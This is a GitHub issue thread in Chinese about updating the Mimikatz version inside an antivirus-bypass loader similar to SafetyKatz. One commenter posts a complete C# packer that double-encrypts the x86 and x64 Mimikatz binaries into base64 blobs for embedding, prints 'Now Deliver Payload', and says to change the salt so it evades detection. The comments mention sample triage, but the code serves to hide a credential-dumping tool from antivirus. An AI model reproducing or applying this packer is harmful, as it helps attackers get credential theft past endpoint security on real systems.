更新Mimikatz版本
wxlg1117 opened this issue · 4 comments
wxlg1117 commented
大佬能详细说说该怎么更新Mimikatz版本么?
另外发现个和你这个差不多的:
https://github.com/GhostPack/SafetyKatz
大佬也指点一下他这个具体怎么更新Mimikatz版本么?
Asteriska001 commented
楼上老哥研究出方法了吗qwq
wxlg1117 commented
没有啊啊啊
Asteriska001 commented
好吧,我这边也研究下,有成果了再交流qwq
SpenserCai commented
过不了nod还要研究一下
把mimikatz的x86和x64放到目录里
using System;
using System.IO;
using System.Text;
using System.IO.Compression;
using System.Collections.Generic;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
namespace MimikatzBypass
{
/// <summary>
/// Offline packing step: reads two executables from the working directory,
/// runs each through <c>Misc.Encrypt</c> twice and writes the result as base64 text.
/// The program that later consumes the .b64 files is not part of this listing.
/// </summary>
/// <remarks>
/// Both passwords are literals in this file and the salt is a constant in Misc,
/// so the output is reversible by anyone holding this listing: base64-decode,
/// then Misc.Decrypt with "password2", then Misc.Decrypt with "password1".
/// That makes a recovered .b64 blob straightforward to unpack during sample triage.
/// The second pass reuses the same salt and derivation as the first; it changes the
/// bytes on disk but adds no secrecy beyond what one pass with a known password gives.
/// </remarks>
class Program
{
    // Applied first (inner layer).
    private const string InnerPassword = "password1";

    // Applied second (outer layer); this is the layer to remove first when decoding.
    private const string OuterPassword = "password2";

    /// <summary>
    /// Produces file.b64 from mimikatz.exe and filex86.b64 from mimikatzx86.exe.
    /// </summary>
    /// <param name="args">Unused.</param>
    static void Main(string[] args)
    {
        // Order is kept: the first pair is fully written before the second input is opened.
        WriteEncodedCopy(@"mimikatz.exe", @"file.b64");
        WriteEncodedCopy(@"mimikatzx86.exe", @"filex86.b64");
    }

    /// <summary>
    /// Reads <paramref name="inputPath"/>, encrypts it with the inner and then the
    /// outer password, and writes the base64 form to <paramref name="outputPath"/>.
    /// </summary>
    private static void WriteEncodedCopy(string inputPath, string outputPath)
    {
        byte[] original = Misc.FileToByteArray(inputPath);
        byte[] firstPass = Misc.Encrypt(original, InnerPassword);
        byte[] secondPass = Misc.Encrypt(firstPass, OuterPassword);

        // File.WriteAllText overwrites any existing file at outputPath.
        File.WriteAllText(outputPath, System.Convert.ToBase64String(secondPass));
    }
}
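/// <summary>
/// File and cipher helpers. Encrypt and Decrypt apply a password-derived Rijndael
/// transform with a salt fixed at compile time. Nothing here authenticates the
/// data, so the result is a reversible encoding of the input, not protected storage.
/// </summary>
public class Misc
{
    //Change This!
    // Earlier salt value, left commented out by the author:
    //private static readonly byte[] SALT = new byte[] { 0xba, 0xdc, 0x0f, 0xfe, 0xeb, 0xad, 0xbe, 0xfd, 0xea, 0xdb, 0xab, 0xef, 0xac, 0xe8, 0xac, 0xdc };
    // The salt is a compile-time constant, so it gives none of the per-secret uniqueness
    // a salt exists for: password + SALT fully determine both key and IV. Being a
    // constant, the same 16 bytes are also present in any build that embeds this class.
    private static readonly byte[] SALT = new byte[] { 0x1f, 0xde, 0x9d, 0xae, 0xcb, 0xb4, 0xae, 0xe8, 0x8f, 0x4b, 0xab, 0xa7, 0x81, 0x96, 0x4c, 0xdc };

    /// <summary>
    /// Encrypts the file at <paramref name="fileName"/> with <paramref name="Key"/>
    /// and writes the raw ciphertext to <paramref name="outFile"/>, then prints a status line.
    /// </summary>
    /// <param name="fileName">Path of the file to read.</param>
    /// <param name="Key">Password passed to <see cref="Encrypt"/>.</param>
    /// <param name="outFile">Path to create or overwrite with the ciphertext.</param>
    public static void Stage(string fileName, string Key, string outFile)
    {
        byte[] raw = FileToByteArray(fileName);
        byte[] file = Encrypt(raw, Key);

        // WriteAllBytes flushes and closes the handle before returning. The previous
        // File.Create + Write never disposed the stream, so the handle stayed open and
        // buffered bytes could remain unwritten until finalization.
        File.WriteAllBytes(outFile, file);
        Console.WriteLine("File Ready, Now Deliver Payload");
    }

    /// <summary>
    /// Returns the full contents of the file at <paramref name="_FileName"/>.
    /// </summary>
    /// <param name="_FileName">Path of the file to read.</param>
    /// <returns>The file's bytes; an empty array for an empty file.</returns>
    public static byte[] FileToByteArray(string _FileName)
    {
        // Replaces a hand-rolled FileStream/BinaryReader read that sized the buffer from a
        // separate FileInfo.Length lookup cast to Int32 (silent truncation above 2 GiB)
        // and left the stream open if the read threw.
        return File.ReadAllBytes(_FileName);
    }

    /// <summary>
    /// Encrypts <paramref name="plain"/> under a key and IV derived from
    /// <paramref name="password"/> and the class salt.
    /// </summary>
    /// <param name="plain">Bytes to encrypt.</param>
    /// <param name="password">Password fed to the key derivation.</param>
    /// <returns>Ciphertext, padded to a whole number of cipher blocks.</returns>
    /// <exception cref="ArgumentNullException"><paramref name="plain"/> is null.</exception>
    public static byte[] Encrypt(byte[] plain, string password)
    {
        if (plain == null)
        {
            throw new ArgumentNullException(nameof(plain));
        }

        return RunCipher(plain, password, true);
    }

    /// <summary>
    /// Reverses <see cref="Encrypt"/> for the same password.
    /// </summary>
    /// <param name="cipher">Bytes produced by <see cref="Encrypt"/>.</param>
    /// <param name="password">Password used when encrypting.</param>
    /// <returns>The recovered plaintext.</returns>
    /// <exception cref="ArgumentNullException"><paramref name="cipher"/> is null.</exception>
    public static byte[] Decrypt(byte[] cipher, string password)
    {
        if (cipher == null)
        {
            throw new ArgumentNullException(nameof(cipher));
        }

        return RunCipher(cipher, password, false);
    }

    /// <summary>
    /// Reads <paramref name="input"/> from its current position to the end.
    /// </summary>
    /// <param name="input">Readable stream.</param>
    /// <returns>All remaining bytes of the stream.</returns>
    /// <exception cref="ArgumentNullException"><paramref name="input"/> is null.</exception>
    public static byte[] ReadFully(Stream input) //Returns Byte Array From Stream
    {
        if (input == null)
        {
            throw new ArgumentNullException(nameof(input));
        }

        using (MemoryStream ms = new MemoryStream())
        {
            input.CopyTo(ms);
            return ms.ToArray();
        }
    }

    // Shared body of Encrypt and Decrypt: derives key/IV and pushes the input through one transform.
    private static byte[] RunCipher(byte[] input, string password, bool encrypt)
    {
        // Rijndael.Create() is left on its defaults (CBC, PKCS7 padding, 128-bit block).
        // The two-argument Rfc2898DeriveBytes constructor uses the class defaults
        // (1000 iterations, HMAC-SHA1). Both are kept so output stays byte-compatible
        // with data produced by the earlier version of this class.
        using (Rijndael rijndael = Rijndael.Create())
        using (Rfc2898DeriveBytes pdb = new Rfc2898DeriveBytes(password, SALT))
        {
            // Key and IV are consecutive slices of the same derived stream, so the IV is
            // fixed per password: identical input always yields identical ciphertext.
            rijndael.Key = pdb.GetBytes(32);
            rijndael.IV = pdb.GetBytes(16);

            using (ICryptoTransform transform = encrypt ? rijndael.CreateEncryptor() : rijndael.CreateDecryptor())
            using (MemoryStream memoryStream = new MemoryStream())
            {
                using (CryptoStream cryptoStream = new CryptoStream(memoryStream, transform, CryptoStreamMode.Write))
                {
                    cryptoStream.Write(input, 0, input.Length);
                    // Disposing the CryptoStream writes the final padded block.
                }

                // ToArray remains valid after the MemoryStream has been closed.
                return memoryStream.ToArray();
            }
        }
    }
}//End Misc Class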
}
把生成的代码放到那两行,然后对应的SALT改一下